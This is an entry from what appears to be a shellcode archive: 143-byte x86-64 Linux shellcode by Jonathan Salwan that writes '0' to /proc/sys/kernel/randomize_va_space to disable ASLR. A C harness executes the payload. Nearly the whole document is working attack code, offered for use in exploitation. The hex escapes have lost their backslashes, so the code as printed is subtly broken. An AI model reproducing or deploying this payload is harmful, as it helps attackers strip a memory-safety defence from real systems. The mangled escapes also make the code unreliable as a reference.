[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Linux/x86-64 - Disable ASLR Security - 143 bytes
# Published : 2010-06-17
# Author : Jonathan Salwan
# Previous Title : Linux/x86-64 - Add root user with password - 390 bytes
# Next Title : Polymorphic Bindport 31337 with setreuid (0,0) linux/x86 


/*
Title:  Linux/x86-64 - Disable ASLR Security - 143 bytes
Date:   2010-06-17
Tested: Archlinux x86_64 k2.6.33

Author: Jonathan Salwan
Web:    http://shell-storm.org | http://twitter.com/shell_storm

! Dtabase of shellcodes http://www.shell-storm.org/shellcode/


Description:
============
 Address space layout randomization (ASLR) is a computer security technique 
 which involves randomly arranging the positions of key data areas, usually 
 including the base  of the executable and position of libraries, heap, and 
 stack, in a process's address space.

 This shellcode disables the ASLR.

*/

#include <stdio.h>


char *SC = 
           /*  open("/proc/sys/kernel/randomize_va_space", O_WRONLY|O_CREAT|O_APPEND, 0644) */

           "x48x31xd2"                                // xor    %rdx,%rdx
           "x48xbbxffxffxffxffxffx61x63x65"    // mov    $0x656361ffffffffff,%rbx
           "x48xc1xebx28"                            // shr    $0x28,%rbx                  
           "x53"                                        // push   %rbx
           "x48xbbx7ax65x5fx76x61x5fx73x70"    // mov    $0x70735f61765f657a,%rbx
           "x53"                                        // push   %rbx
           "x48xbbx2fx72x61x6ex64x6fx6dx69"    // mov    $0x696d6f646e61722f,%rbx
           "x53"                                        // push   %rbx
           "x48xbbx73x2fx6bx65x72x6ex65x6c"    // mov    $0x6c656e72656b2f73,%rbx
           "x53"                                        // push   %rbx
           "x48xbbx2fx70x72x6fx63x2fx73x79"    // mov    $0x79732f636f72702f,%rbx
           "x53"                                        // push   %rbx
           "x48x89xe7"                                // mov    %rsp,%rdi
           "x66xbex41x04"                            // mov    $0x441,%si
           "x66xbaxa4x01"                            // mov    $0x1a4,%dx
           "x48x31xc0"                                // xor    %rax,%rax
           "xb0x02"                                    // mov    $0x2,%al
           "x0fx05"                                    // syscall


           /* write(3, "0n", 2) */

           "x48xbfxffxffxffxffxffxffxffx03"    // mov    $0x3ffffffffffffff,%rdi
           "x48xc1xefx38"                            // shr    $0x38,%rdi
           "x48xbbxffxffxffxffxffxffx30x0a"    // mov    $0xa30ffffffffffff,%rbx
           "x48xc1xebx30"                            // shr    $0x30,%rbx
           "x53"                                        // push   %rbx
           "x48x89xe6"                                // mov    %rsp,%rsi
           "x48xbaxffxffxffxffxffxffxffx02"    // mov    $0x2ffffffffffffff,%rdx
           "x48xc1xeax38"                            // shr    $0x38,%rdx
           "x48x31xc0"                                // xor    %rax,%rax
           "xb0x01"                                    // mov    $0x1,%al
           "x0fx05"                                    // syscall


           /* _exit(0) */

           "x48x31xff"                                // xor    %rdi,%rdi
           "x48x31xc0"                                // xor    %rax,%rax
           "xb0x3c"                                    // mov    $0x3c,%al
           "x0fx05";                                   // syscall


int main(void)
{
        fprintf(stdout,"Length: %dn",strlen(SC));
        (*(void(*)()) SC)();
return 0;
}